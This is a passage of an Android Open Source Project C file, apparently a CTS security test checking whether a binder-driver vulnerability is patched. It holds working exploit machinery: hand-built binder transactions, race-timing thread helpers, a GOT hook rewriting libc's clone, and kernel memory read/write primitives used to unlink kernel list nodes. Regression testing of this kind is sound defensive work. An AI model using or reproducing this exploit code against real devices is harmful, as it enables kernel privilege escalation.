1 /*
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #define _GNU_SOURCE
18 #include <sys/mman.h>
19 #include <sys/types.h>
20 #include <sys/stat.h>
21 #include <sys/socket.h>
22 #include <sys/sysinfo.h>
23 #include <sys/un.h>
24 #include <sys/prctl.h>
25
26 #include <stdio.h>
27 #include <stdlib.h>
28 #include <string.h>
29 #include <syscall.h>
30 #include <pthread.h>
31 #include <dirent.h>
32 #include <unistd.h>
33 #include <fcntl.h>
34 #include <errno.h>
35 #include <sched.h>
36 #include <poll.h>
37 #include <elf.h>
38
39 #include <cutils/log.h>
40 #include <cutils/properties.h>
41 #include <jni.h>
42 #include <linux/android/binder.h>
43
44 #include "../../../../hostsidetests/securitybulletin/securityPatch/includes/common.h"
45
46 typedef uint8_t u8;
47 typedef uint16_t u16;
48 typedef uint32_t u32;
49 typedef uint64_t u64;
50 typedef int64_t s64;
51
52 jobject this;
53 jmethodID add_log;
54 JavaVM *jvm;
55
56 #define MAX_THREADS 10
57
58 struct tid_jenv {
59 int tid;
60 JNIEnv *env;
61 };
62 struct tid_jenv tid_jenvs[MAX_THREADS];
63 int num_threads;
64
gettid()65 int gettid() {
66 return (int)syscall(SYS_gettid);
67 }
68
69 void fail(char *msg, ...);
70
add_jenv(JNIEnv * e)71 void add_jenv(JNIEnv *e) {
72 if (num_threads >= MAX_THREADS) {
73 fail("too many threads");
74 return;
75 }
76 struct tid_jenv *te = &tid_jenvs[num_threads++];
77 te->tid = gettid();
78 te->env = e;
79 }
80
get_jenv()81 JNIEnv *get_jenv() {
82 int tid = gettid();
83 for (int i = 0; i < num_threads; i++) {
84 struct tid_jenv *te = &tid_jenvs[i];
85 if (te->tid == tid)
86 return te->env;
87 }
88 return NULL;
89 }
90
jni_attach_thread()91 void jni_attach_thread() {
92 JNIEnv *env;
93 (*jvm)->AttachCurrentThread(jvm, &env, NULL);
94 add_jenv(env);
95 }
96
97 pthread_mutex_t log_mut = PTHREAD_MUTEX_INITIALIZER;
98 pthread_cond_t log_pending = PTHREAD_COND_INITIALIZER;
99 pthread_cond_t log_done = PTHREAD_COND_INITIALIZER;
100 volatile char *log_line;
101
send_log_thread(char * msg)102 void send_log_thread(char *msg) {
103 pthread_mutex_lock(&log_mut);
104 while (log_line)
105 pthread_cond_wait(&log_done, &log_mut);
106 log_line = msg;
107 pthread_cond_signal(&log_pending);
108 pthread_mutex_unlock(&log_mut);
109 }
110
111 void dbg(char *msg, ...);
112
log_thread(u64 arg)113 void log_thread(u64 arg) {
114 while (1) {
115 pthread_mutex_lock(&log_mut);
116 while (!log_line)
117 pthread_cond_wait(&log_pending, &log_mut);
118 dbg("%s", log_line);
119 free((void*)log_line);
120 log_line = NULL;
121 pthread_cond_signal(&log_done);
122 pthread_mutex_unlock(&log_mut);
123 }
124 }
125
dbg(char * msg,...)126 void dbg(char *msg, ...) {
127 char *line;
128 va_list va;
129 JNIEnv *env = get_jenv();
130 va_start(va, msg);
131 if (vasprintf(&line, msg, va) >= 0) {
132 if (env) {
133 jstring jline = (*env)->NewStringUTF(env, line);
134 (*env)->CallVoidMethod(env, this, add_log, jline);
135 free(line);
136 } else {
137 send_log_thread(line);
138 }
139 }
140 va_end(va);
141 }
142
fail(char * msg,...)143 void fail(char *msg, ...) {
144 char *line;
145 va_list va;
146 va_start(va, msg);
147 if (vasprintf(&line, msg, va) >= 0)
148 dbg("FAIL: %s (errno=%d)", line, errno);
149 va_end(va);
150 }
151
152 struct buffer {
153 char *p;
154 u32 size;
155 u32 off;
156 };
157
158 typedef struct buffer buf_t;
159
160 struct parser {
161 u8 *buf;
162 u8 *p;
163 u32 size;
164 };
165
166 typedef struct parser parser_t;
167
new_parser()168 parser_t *new_parser() {
169 parser_t *ret = malloc(sizeof(parser_t));
170 ret->size = 0x400;
171 ret->buf = ret->p = malloc(ret->size);
172 return ret;
173 }
174
free_parser(parser_t * parser)175 void free_parser(parser_t *parser) {
176 free(parser->buf);
177 free(parser);
178 }
179
parser_end(parser_t * p)180 int parser_end(parser_t *p) {
181 return !p->size;
182 }
183
parser_get(parser_t * p,u32 sz)184 void *parser_get(parser_t *p, u32 sz) {
185 if (sz > p->size) {
186 fail("parser size exceeded");
187 return NULL;
188 }
189 p->size -= sz;
190 u8 *ret = p->p;
191 p->p += sz;
192 return ret;
193 }
194
parse_u32(parser_t * p)195 u32 parse_u32(parser_t *p) {
196 u32 *pu32 = parser_get(p, sizeof(u32));
197 return (pu32 == NULL) ? (u32)-1 : *pu32;
198 }
199
new_buf_sz(u32 sz)200 buf_t *new_buf_sz(u32 sz) {
201 buf_t *b = malloc(sizeof(buf_t));
202 b->size = sz;
203 b->off = 0;
204 b->p = malloc(sz);
205 return b;
206 }
207
new_buf()208 buf_t *new_buf() {
209 return new_buf_sz(0x200);
210 }
211
free_buf(buf_t * buf)212 void free_buf(buf_t *buf) {
213 free(buf->p);
214 free(buf);
215 }
216
buf_alloc(buf_t * b,u32 s)217 void *buf_alloc(buf_t *b, u32 s) {
218 s = (s + 3) & ~3;
219 if (b->size - b->off < s)
220 fail("out of buf space");
221 char *ret = b->p + b->off;
222 b->off += s;
223 memset(ret, 0x00, s);
224 return ret;
225 }
226
buf_u32(buf_t * b,u32 v)227 void buf_u32(buf_t *b, u32 v) {
228 char *p = buf_alloc(b, sizeof(u32));
229 *(u32*)p = v;
230 }
231
buf_u64(buf_t * b,u64 v)232 void buf_u64(buf_t *b, u64 v) {
233 char *p = buf_alloc(b, sizeof(u64));
234 *(u64*)p = v;
235 }
236
buf_uintptr(buf_t * b,u64 v)237 void buf_uintptr(buf_t *b, u64 v) {
238 char *p = buf_alloc(b, sizeof(u64));
239 *(u64*)p = v;
240 }
241
buf_str16(buf_t * b,const char * s)242 void buf_str16(buf_t *b, const char *s) {
243 if (!s) {
244 buf_u32(b, 0xffffffff);
245 return;
246 }
247 u32 len = strlen(s);
248 buf_u32(b, len);
249 u16 *dst = (u16*)buf_alloc(b, (len + 1) * 2);
250 for (u32 i = 0; i < len; i++)
251 dst[i] = s[i];
252 dst[len] = 0;
253 }
254
buf_binder(buf_t * b,buf_t * off,void * ptr)255 void buf_binder(buf_t *b, buf_t *off, void *ptr) {
256 buf_u64(off, b->off);
257 struct flat_binder_object *fp = buf_alloc(b, sizeof(*fp));
258 fp->hdr.type = BINDER_TYPE_BINDER;
259 fp->flags = FLAT_BINDER_FLAG_ACCEPTS_FDS;
260 fp->binder = (u64)ptr;
261 fp->cookie = 0;
262 }
263
264 static inline void binder_write(int fd, buf_t *buf);
265
enter_looper(int fd)266 void enter_looper(int fd) {
267 buf_t *buf = new_buf();
268 buf_u32(buf, BC_ENTER_LOOPER);
269 binder_write(fd, buf);
270 }
271
init_binder(int fd)272 void init_binder(int fd) {
273 void *map_ret = mmap(NULL, 0x200000, PROT_READ, MAP_PRIVATE, fd, 0);
274 if (map_ret == MAP_FAILED)
275 fail("map fail");
276 enter_looper(fd);
277 }
278
open_binder()279 int open_binder() {
280 int fd = open("/dev/binder", O_RDONLY);
281 if (fd < 0)
282 fail("open binder fail");
283 init_binder(fd);
284 return fd;
285 }
286
binder_rw(int fd,void * rbuf,u32 rsize,void * wbuf,u32 wsize,u32 * read_consumed,u32 * write_consumed)287 static inline void binder_rw(int fd, void *rbuf, u32 rsize,
288 void *wbuf, u32 wsize, u32 *read_consumed, u32 *write_consumed) {
289 struct binder_write_read bwr;
290 memset(&bwr, 0x00, sizeof(bwr));
291 bwr.read_buffer = (u64)rbuf;
292 bwr.read_size = rsize;
293 bwr.write_buffer = (u64)wbuf;
294 bwr.write_size = wsize;
295 if (ioctl(fd, BINDER_WRITE_READ, &bwr) < 0)
296 fail("binder ioctl fail");
297 if (read_consumed)
298 *read_consumed = bwr.read_consumed;
299 if (write_consumed)
300 *write_consumed = bwr.write_consumed;
301 }
302
binder_read(int fd,void * rbuf,u32 rsize,u32 * read_consumed)303 void binder_read(int fd, void *rbuf, u32 rsize, u32 *read_consumed) {
304 binder_rw(fd, rbuf, rsize, 0, 0, read_consumed, NULL);
305 }
306
binder_write(int fd,buf_t * buf)307 static inline void binder_write(int fd, buf_t *buf) {
308 u32 write_consumed;
309 binder_rw(fd, 0, 0, buf->p, buf->off, NULL, &write_consumed);
310 if (write_consumed != buf->off)
311 fail("binder write fail");
312 free_buf(buf);
313 }
314
do_send_txn(int fd,u32 to,u32 code,buf_t * trdat,buf_t * troff,int oneway,int is_reply,binder_size_t extra_sz)315 void do_send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff, int oneway, int is_reply, binder_size_t extra_sz) {
316 buf_t *buf = new_buf();
317 buf_u32(buf, is_reply ? BC_REPLY_SG : BC_TRANSACTION_SG);
318 struct binder_transaction_data_sg *tr;
319 tr = buf_alloc(buf, sizeof(*tr));
320 struct binder_transaction_data *trd = &tr->transaction_data;
321 trd->target.handle = to;
322 trd->code = code;
323 if (oneway)
324 trd->flags |= TF_ONE_WAY;
325 trd->data.ptr.buffer = trdat ? (u64)trdat->p : 0;
326 trd->data.ptr.offsets = troff ? (u64)troff->p : 0;
327 trd->data_size = trdat ? trdat->off : 0;
328 trd->offsets_size = troff ? troff->off : 0;
329 tr->buffers_size = extra_sz;
330 binder_write(fd, buf);
331 if (trdat)
332 free_buf(trdat);
333 if (troff)
334 free_buf(troff);
335 }
336
send_txn(int fd,u32 to,u32 code,buf_t * trdat,buf_t * troff)337 void send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff) {
338 do_send_txn(fd, to, code, trdat, troff, 0, 0, 0);
339 }
340
send_reply(int fd)341 void send_reply(int fd) {
342 do_send_txn(fd, 0, 0, NULL, NULL, 0, 1, 0);
343 }
344
chg_ref(int fd,unsigned desc,u32 cmd)345 static inline void chg_ref(int fd, unsigned desc, u32 cmd) {
346 buf_t *buf = new_buf();
347 buf_u32(buf, cmd);
348 buf_u32(buf, desc);
349 binder_write(fd, buf);
350 }
351
inc_ref(int fd,unsigned desc)352 void inc_ref(int fd, unsigned desc) {
353 chg_ref(fd, desc, BC_ACQUIRE);
354 }
355
dec_ref(int fd,unsigned desc)356 void dec_ref(int fd, unsigned desc) {
357 chg_ref(fd, desc, BC_RELEASE);
358 }
359
free_buffer(int fd,u64 ptr)360 static inline void free_buffer(int fd, u64 ptr) {
361 buf_t *buf = new_buf();
362 buf_u32(buf, BC_FREE_BUFFER);
363 buf_uintptr(buf, ptr);
364 binder_write(fd, buf);
365 }
366
367 typedef struct {
368 int fd;
369 char *buf;
370 binder_size_t size;
371 binder_size_t parsed;
372 binder_size_t *offsets;
373 binder_size_t num_offsets;
374 u32 code;
375 u64 ptr;
376 } txn_t;
377
txn_get(txn_t * t,u32 sz)378 void *txn_get(txn_t *t, u32 sz) {
379 sz = (sz + 3) & ~3u;
380 if (sz > t->size - t->parsed)
381 fail("txn get not enough data");
382 char *ret = t->buf + t->parsed;
383 t->parsed += sz;
384 return ret;
385 }
386
txn_offset(txn_t * t)387 binder_size_t txn_offset(txn_t *t) {
388 return t->parsed;
389 }
390
txn_set_offset(txn_t * t,binder_size_t off)391 void txn_set_offset(txn_t *t, binder_size_t off) {
392 t->parsed = off;
393 }
394
txn_u32(txn_t * t)395 u32 txn_u32(txn_t *t) {
396 return *(u32*)txn_get(t, sizeof(u32));
397 }
398
txn_int(txn_t * t)399 int txn_int(txn_t *t) {
400 return *(int*)txn_get(t, sizeof(int));
401 }
402
txn_handle(txn_t * t)403 u32 txn_handle(txn_t *t) {
404 struct flat_binder_object *fp;
405 fp = txn_get(t, sizeof(*fp));
406 if (fp->hdr.type != BINDER_TYPE_HANDLE)
407 fail("expected binder");
408 return fp->handle;
409 }
410
txn_str(txn_t * t)411 u16 *txn_str(txn_t *t) {
412 int len = txn_int(t);
413 if (len == -1)
414 return NULL;
415 if (len > 0x7fffffff / 2 - 1)
416 fail("bad txn str len");
417 return txn_get(t, (len + 1) * 2);
418 }
419
txn_buf(txn_t * t)420 static inline u64 txn_buf(txn_t *t) {
421 return (u64)t->buf;
422 }
423
free_txn(txn_t * txn)424 void free_txn(txn_t *txn) {
425 free_buffer(txn->fd, txn_buf(txn));
426 }
427
428
handle_cmd(int fd,u32 cmd,void * dat)429 void handle_cmd(int fd, u32 cmd, void *dat) {
430 if (cmd == BR_ACQUIRE || cmd == BR_INCREFS) {
431 struct binder_ptr_cookie *pc = dat;
432 buf_t *buf = new_buf();
433 u32 reply = cmd == BR_ACQUIRE ? BC_ACQUIRE_DONE : BC_INCREFS_DONE;
434 buf_u32(buf, reply);
435 buf_uintptr(buf, pc->ptr);
436 buf_uintptr(buf, pc->cookie);
437 binder_write(fd, buf);
438 }
439 }
440
recv_txn(int fd,txn_t * t)441 void recv_txn(int fd, txn_t *t) {
442 u32 found = 0;
443 while (!found) {
444 parser_t *p = new_parser();
445 binder_read(fd, p->p, p->size, &p->size);
446 while (!parser_end(p)) {
447 u32 cmd = parse_u32(p);
448 void *dat = (void *)parser_get(p, _IOC_SIZE(cmd));
449 if (dat == NULL) {
450 free_parser(p);
451 return;
452 }
453 handle_cmd(fd, cmd, dat);
454 if (cmd == BR_TRANSACTION || cmd == BR_REPLY) {
455 struct binder_transaction_data *tr = dat;
456 if (!parser_end(p))
457 fail("expected parser end");
458 t->fd = fd;
459 t->buf = (char*)tr->data.ptr.buffer;
460 t->parsed = 0;
461 t->size = tr->data_size;
462 t->offsets = (binder_size_t*)tr->data.ptr.offsets;
463 t->num_offsets = tr->offsets_size / sizeof(binder_size_t);
464 t->code = tr->code;
465 t->ptr = tr->target.ptr;
466 found = 1;
467 }
468 }
469 free_parser(p);
470 }
471 }
472
recv_handle(int fd)473 u32 recv_handle(int fd) {
474 txn_t txn;
475 recv_txn(fd, &txn);
476 u32 hnd = txn_handle(&txn);
477 inc_ref(fd, hnd);
478 free_txn(&txn);
479 return hnd;
480 }
481
get_activity_svc(int fd)482 u32 get_activity_svc(int fd) {
483 buf_t *trdat = new_buf();
484 buf_u32(trdat, 0); // policy
485 buf_str16(trdat, "android.os.IServiceManager");
486 buf_str16(trdat, "activity");
487 int SVC_MGR_GET_SERVICE = 1;
488 send_txn(fd, 0, SVC_MGR_GET_SERVICE, trdat, NULL);
489 return recv_handle(fd);
490 }
491
txn_part(txn_t * t)492 void txn_part(txn_t *t) {
493 int repr = txn_int(t);
494 if (repr == 0) {
495 txn_str(t);
496 txn_str(t);
497 } else if (repr == 1 || repr == 2) {
498 txn_str(t);
499 } else {
500 fail("txn part bad repr");
501 }
502 }
503
txn_uri(txn_t * t)504 void txn_uri(txn_t *t) {
505 int type = txn_int(t);
506 if (type == 0) // NULL_TYPE_ID
507 return;
508 if (type == 1) { // StringUri.TYPE_ID
509 txn_str(t);
510 } else if (type == 2) {
511 txn_str(t);
512 txn_part(t);
513 txn_part(t);
514 } else if (type == 3) {
515 txn_str(t);
516 txn_part(t);
517 txn_part(t);
518 txn_part(t);
519 txn_part(t);
520 } else {
521 fail("txn uri bad type");
522 }
523 }
524
txn_component(txn_t * t)525 void txn_component(txn_t *t) {
526 u16 *pkg = txn_str(t);
527 if (pkg)
528 txn_str(t); // class
529 }
530
txn_rect(txn_t * t)531 void txn_rect(txn_t *t) {
532 txn_int(t);
533 txn_int(t);
534 txn_int(t);
535 txn_int(t);
536 }
537
str16_eq(u16 * s16,char * s)538 int str16_eq(u16 *s16, char *s) {
539 while (*s) {
540 if (*s16++ != *s++)
541 return 0;
542 }
543 return !*s16;
544 }
545
txn_bundle(txn_t * t,u32 * hnd)546 void txn_bundle(txn_t *t, u32 *hnd) {
547 int len = txn_int(t);
548 if (len < 0)
549 fail("bad bundle len");
550 if (len == 0)
551 return;
552 int magic = txn_int(t);
553 if (magic != 0x4c444e42 && magic != 0x4c444e44)
554 fail("bad bundle magic");
555 binder_size_t off = txn_offset(t);
556 int count = txn_int(t);
557 if (count == 1) {
558 u16 *key = txn_str(t);
559 int type = txn_int(t);
560 if (str16_eq(key, "bnd") && type == 15)
561 *hnd = txn_handle(t);
562 }
563 txn_set_offset(t, off);
564 txn_get(t, len);
565 }
566
txn_intent(txn_t * t,u32 * hnd)567 void txn_intent(txn_t *t, u32 *hnd) {
568 txn_str(t); // action
569 txn_uri(t);
570 txn_str(t); // type
571 txn_int(t); // flags
572 txn_str(t); // package
573 txn_component(t);
574 if (txn_int(t)) // source bounds
575 txn_rect(t);
576 int n = txn_int(t);
577 if (n > 0) {
578 for (int i = 0; i < n; i++)
579 txn_str(t);
580 }
581 if (txn_int(t)) // selector
582 txn_intent(t, NULL);
583 if (txn_int(t))
584 fail("unexpected clip data");
585 txn_int(t); // content user hint
586 txn_bundle(t, hnd); // extras
587 }
588
get_task_info(int fd,u32 app_task,u32 * hnd)589 void get_task_info(int fd, u32 app_task, u32 *hnd) {
590 buf_t *trdat = new_buf();
591 buf_u32(trdat, 0); // policy
592 buf_str16(trdat, "android.app.IAppTask");
593 send_txn(fd, app_task, 1 + 1, trdat, NULL);
594 txn_t txn;
595 recv_txn(fd, &txn);
596 if (txn_u32(&txn) != 0)
597 fail("getTaskInfo exception");
598 if (txn_int(&txn) == 0)
599 fail("getTaskInfo returned null");
600 txn_int(&txn); // id
601 txn_int(&txn); // persistent id
602 if (txn_int(&txn) > 0) // base intent
603 txn_intent(&txn, hnd);
604 if (*hnd != ~0u)
605 inc_ref(fd, *hnd);
606 free_txn(&txn);
607 }
608
get_app_tasks(int fd,u32 actsvc)609 u32 get_app_tasks(int fd, u32 actsvc) {
610 buf_t *trdat = new_buf();
611 buf_u32(trdat, 0); // policy
612 buf_str16(trdat, "android.app.IActivityManager");
613 buf_str16(trdat, "android.security.cts");
614 send_txn(fd, actsvc, 1 + 199, trdat, NULL);
615 txn_t txn;
616 recv_txn(fd, &txn);
617 if (txn_u32(&txn) != 0)
618 fail("getAppTasks exception");
619 int n = txn_int(&txn);
620 if (n < 0)
621 fail("getAppTasks n < 0");
622 u32 hnd = ~0u;
623 for (int i = 0; i < n; i++) {
624 u32 app_task = txn_handle(&txn);
625 get_task_info(fd, app_task, &hnd);
626 if (hnd != ~0u)
627 break;
628 }
629 if (hnd == ~0u)
630 fail("didn't find intent extras binder");
631 free_txn(&txn);
632 return hnd;
633 }
634
get_exchg(int fd)635 u32 get_exchg(int fd) {
636 u32 actsvc = get_activity_svc(fd);
637 u32 ret = get_app_tasks(fd, actsvc);
638 dec_ref(fd, actsvc);
639 return ret;
640 }
641
get_binder(u32 * exchg)642 int get_binder(u32 *exchg) {
643 int fd = open_binder();
644 *exchg = get_exchg(fd);
645 return fd;
646 }
647
exchg_put_binder(int fd,u32 exchg)648 void exchg_put_binder(int fd, u32 exchg) {
649 buf_t *trdat = new_buf();
650 buf_t *troff = new_buf();
651 buf_u32(trdat, 0); // policy
652 buf_str16(trdat, "android.security.cts.IBinderExchange");
653 buf_binder(trdat, troff, (void*)1);
654 send_txn(fd, exchg, 1, trdat, troff);
655 txn_t txn;
656 recv_txn(fd, &txn);
657 free_txn(&txn);
658 }
659
exchg_get_binder(int fd,u32 exchg)660 u32 exchg_get_binder(int fd, u32 exchg) {
661 buf_t *trdat = new_buf();
662 buf_u32(trdat, 0); // policy
663 buf_str16(trdat, "android.security.cts.IBinderExchange");
664 send_txn(fd, exchg, 2, trdat, NULL);
665 txn_t txn;
666 recv_txn(fd, &txn);
667 if (txn_u32(&txn) != 0)
668 fail("getBinder exception");
669 u32 hnd = txn_handle(&txn);
670 inc_ref(fd, hnd);
671 free_txn(&txn);
672 return hnd;
673 }
674
set_idle()675 void set_idle() {
676 struct sched_param param = {
677 .sched_priority = 0
678 };
679 if (sched_setscheduler(0, SCHED_IDLE, ¶m) < 0)
680 fail("sched_setscheduler fail");
681 }
682
do_set_cpu(int cpu)683 int do_set_cpu(int cpu) {
684 cpu_set_t set;
685 CPU_ZERO(&set);
686 CPU_SET(cpu, &set);
687 return sched_setaffinity(0, sizeof(set), &set);
688 }
689
set_cpu(int cpu)690 void set_cpu(int cpu) {
691 if (do_set_cpu(cpu) < 0)
692 fail("sched_setaffinity fail");
693 }
694
695 struct sync {
696 pthread_cond_t cond;
697 pthread_mutex_t mutex;
698 volatile int triggered;
699 size_t num_waiters;
700 volatile size_t num_waited;
701 volatile size_t num_done;
702 };
703
704 typedef struct sync sync_t;
705
alloc_sync()706 sync_t *alloc_sync() {
707 sync_t *ret = malloc(sizeof(sync_t));
708 if (pthread_mutex_init(&ret->mutex, NULL) ||
709 pthread_cond_init(&ret->cond, NULL))
710 fail("pthread init failed");
711 ret->triggered = 0;
712 ret->num_waiters = 1;
713 ret->num_waited = 0;
714 ret->num_done = 0;
715 return ret;
716 }
717
sync_set_num_waiters(sync_t * sync,size_t num_waiters)718 void sync_set_num_waiters(sync_t *sync, size_t num_waiters) {
719 sync->num_waiters = num_waiters;
720 }
721
sync_pth_bc(sync_t * sync)722 void sync_pth_bc(sync_t *sync) {
723 if (pthread_cond_broadcast(&sync->cond) != 0)
724 fail("pthread_cond_broadcast failed");
725 }
726
sync_pth_wait(sync_t * sync)727 void sync_pth_wait(sync_t *sync) {
728 pthread_cond_wait(&sync->cond, &sync->mutex);
729 }
730
sync_wait(sync_t * sync)731 void sync_wait(sync_t *sync) {
732 pthread_mutex_lock(&sync->mutex);
733 sync->num_waited++;
734 sync_pth_bc(sync);
735 while (!sync->triggered)
736 sync_pth_wait(sync);
737 pthread_mutex_unlock(&sync->mutex);
738 }
739
sync_signal(sync_t * sync)740 void sync_signal(sync_t *sync) {
741 pthread_mutex_lock(&sync->mutex);
742 while (sync->num_waited != sync->num_waiters)
743 sync_pth_wait(sync);
744 sync->triggered = 1;
745 sync_pth_bc(sync);
746 pthread_mutex_unlock(&sync->mutex);
747 }
748
sync_done(sync_t * sync)749 void sync_done(sync_t *sync) {
750 pthread_mutex_lock(&sync->mutex);
751 sync->num_done++;
752 sync_pth_bc(sync);
753 while (sync->triggered)
754 sync_pth_wait(sync);
755 pthread_mutex_unlock(&sync->mutex);
756 }
757
sync_wait_done(sync_t * sync)758 void sync_wait_done(sync_t *sync) {
759 pthread_mutex_lock(&sync->mutex);
760 while (sync->num_done != sync->num_waiters)
761 sync_pth_wait(sync);
762 sync->triggered = 0;
763 sync->num_waited = 0;
764 sync->num_done = 0;
765 sync_pth_bc(sync);
766 pthread_mutex_unlock(&sync->mutex);
767 }
768
ns_to_timespec(u64 t,struct timespec * ts)769 static inline void ns_to_timespec(u64 t, struct timespec *ts) {
770 const u64 k = 1000000000;
771 ts->tv_sec = t / k;
772 ts->tv_nsec = t % k;
773 }
774
timespec_to_ns(volatile struct timespec * t)775 static inline u64 timespec_to_ns(volatile struct timespec *t) {
776 return (u64)t->tv_sec * 1000000000 + t->tv_nsec;
777 }
778
time_now()779 static inline u64 time_now() {
780 struct timespec now;
781 if (clock_gettime(CLOCK_MONOTONIC, &now) < 0)
782 fail("clock_gettime failed");
783 return timespec_to_ns(&now);
784 }
785
sleep_until(u64 t)786 static inline void sleep_until(u64 t) {
787 struct timespec wake;
788 ns_to_timespec(t, &wake);
789 int ret = clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
790 if (ret && ret != EINTR)
791 fail("clock_nanosleep failed");
792 }
793
set_thread_name(const char * name)794 void set_thread_name(const char *name) {
795 if (prctl(PR_SET_NAME, name) < 0)
796 fail("pr_set_name fail");
797 }
798
set_timerslack()799 void set_timerslack() {
800 char path[64];
801 sprintf(path, "/proc/%d/timerslack_ns", gettid());
802 int fd = open(path, O_WRONLY);
803 if (fd < 0)
804 fail("open timerslack fail");
805 if (write(fd, "1\n", 2) != 2)
806 fail("write timeslack fail");
807 close(fd);
808 }
809
810 struct launch_dat {
811 u64 arg;
812 void (*func)(u64);
813 int attach_jni;
814 const char *name;
815 };
816
thread_start(void * vdat)817 void *thread_start(void *vdat) {
818 struct launch_dat *dat = vdat;
819 if (dat->attach_jni)
820 jni_attach_thread();
821 set_thread_name(dat->name);
822 void (*func)(u64) = dat->func;
823 u64 arg = dat->arg;
824 free(dat);
825 (*func)(arg);
826 return NULL;
827 }
828
launch_thread(const char * name,void (* func)(u64),sync_t ** sync,u64 arg,int attach_jni)829 int launch_thread(const char *name, void (*func)(u64), sync_t **sync, u64 arg,
830 int attach_jni) {
831 if (sync)
832 *sync = alloc_sync();
833 struct launch_dat *dat = malloc(sizeof(*dat));
834 dat->func = func;
835 dat->arg = arg;
836 dat->attach_jni = attach_jni;
837 dat->name = name;
838 pthread_t th;
839 if (pthread_create(&th, NULL, thread_start, dat) != 0)
840 fail("pthread_create failed");
841 return pthread_gettid_np(th);
842 }
843
map_path(const char * path,u64 * size)844 void *map_path(const char *path, u64 *size) {
845 int fd = open(path, O_RDONLY);
846 if (fd < 0)
847 fail("open libc fail");
848 struct stat st;
849 if (fstat(fd, &st) < 0)
850 fail("fstat fail");
851 void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
852 if (map == MAP_FAILED)
853 fail("mmap libc fail");
854 *size = st.st_size;
855 close(fd);
856 return map;
857 }
858
859 typedef Elf64_Ehdr ehdr_t;
860 typedef Elf64_Shdr shdr_t;
861 typedef Elf64_Rela rela_t;
862 typedef Elf64_Sym sym_t;
863
find_rela_plt(void * elf)864 shdr_t *find_rela_plt(void *elf) {
865 ehdr_t *ehdr = (ehdr_t *)elf;
866 shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
867 char *shstr = ((char *)elf) + shdr[ehdr->e_shstrndx].sh_offset;
868 for (u64 i = 0; i < ehdr->e_shnum; i++) {
869 char *name = shstr + shdr[i].sh_name;
870 if (strcmp(name, ".rela.plt") == 0)
871 return &shdr[i];
872 }
873 fail("didn't find .rela.plt");
874 return NULL;
875 }
876
find_elf_clone_got(const char * path)877 u64 find_elf_clone_got(const char *path) {
878 u64 mapsz;
879 void *elf = map_path(path, &mapsz);
880 ehdr_t *ehdr = (ehdr_t *)elf;
881 shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
882 shdr_t *rphdr = find_rela_plt(elf);
883 if (rphdr == NULL) {
884 return (u64)0;
885 }
886 shdr_t *symhdr = &shdr[rphdr->sh_link];
887 shdr_t *strhdr = &shdr[symhdr->sh_link];
888 sym_t *sym = ((sym_t *)elf) + symhdr->sh_offset;
889 char *str = ((char *)elf) + strhdr->sh_offset;
890 rela_t *r = ((rela_t *)elf) + rphdr->sh_offset;
891 rela_t *end = r + rphdr->sh_size / sizeof(rela_t);
892 u64 ret = 0;
893 for (; r < end; r++) {
894 sym_t *s = &sym[ELF64_R_SYM(r->r_info)];
895 if (strcmp(str + s->st_name, "clone") == 0) {
896 ret = r->r_offset;
897 break;
898 }
899 }
900 if (!ret) {
901 fail("clone rela not found");
902 return (u64)0;
903 }
904 if (munmap(elf, mapsz) < 0) {
905 fail("munmap fail");
906 return (u64)0;
907 }
908 return ret;
909 }
910
911 int hook_tid;
912 int (*real_clone)(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f);
913
clone_unshare_files(u64 a,u64 b,int flags,u64 c,u64 d,u64 e,u64 f)914 int clone_unshare_files(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f) {
915 if (gettid() == hook_tid)
916 flags &= ~CLONE_FILES;
917 return (*real_clone)(a, b, flags, c, d, e, f);
918 }
919
unshare_following_clone_files()920 void unshare_following_clone_files() {
921 hook_tid = gettid();
922 }
923
hook_clone()924 void hook_clone() {
925 void *p = (void*)((uintptr_t)clone & ~0xffful);
926 while (*(u32*)p != 0x464c457f)
927 p = (void *)(((u32 *)p) - 0x1000);
928 u64 *got = ((u64 *)p) + find_elf_clone_got("/system/lib64/libc.so");
929 if (*got != (u64)clone)
930 fail("bad got");
931 real_clone = (void*)clone;
932 void *page = (void*)((u64)got & ~0xffful);
933 if (mprotect(page, 0x1000, PROT_READ | PROT_WRITE) < 0) {
934 fail("got mprotect fail");
935 return;
936 }
937 *got = (u64)clone_unshare_files;
938 }
939
940 u32 r32(u64 addr);
941 u64 r64(u64 addr);
942 void w64(u64 addr, u64 val);
943 void w128(u64 addr, u64 v1, u64 v2);
944 u64 scratch;
945 u64 rw_task;
946 u64 current;
947 u64 fdarr;
948
hlist_del(u64 node)949 void hlist_del(u64 node) {
950 u64 next = r64(node);
951 u64 pprev = r64(node + 8);
952 if (r64(pprev) != node) {
953 fail("bad hlist");
954 return;
955 }
956 w64(pprev, next);
957 if (next)
958 w64(next + 8, pprev);
959 }
960
get_file(int fd)961 u64 get_file(int fd) {
962 return r64(fdarr + fd * 8);
963 }
964
first_bl(u64 func)965 u64 first_bl(u64 func) {
966 for (int i = 0; i < 30; i++) {
967 u32 inst = r32(func + i * 4);
968 if ((inst >> 26) == 0x25) { // bl
969 s64 off = inst & ((1u << 26) - 1);
970 off <<= 64 - 26;
971 off >>= 64 - 26;
972 return func + i * 4 + off * 4;
973 }
974 }
975 fail("bl not found");
976 return (u64)-1;
977 }
978
is_adrp(u32 inst)979 int is_adrp(u32 inst) {
980 return ((inst >> 24) & 0x9f) == 0x90;
981 }
982
parse_adrp(u64 p,u32 inst)983 u64 parse_adrp(u64 p, u32 inst) {
984 s64 off = ((inst >> 5) & ((1u << 19) - 1)) << 2;
985 off |= (inst >> 29) & 3;
986 off <<= (64 - 21);
987 off >>= (64 - 21 - 12);
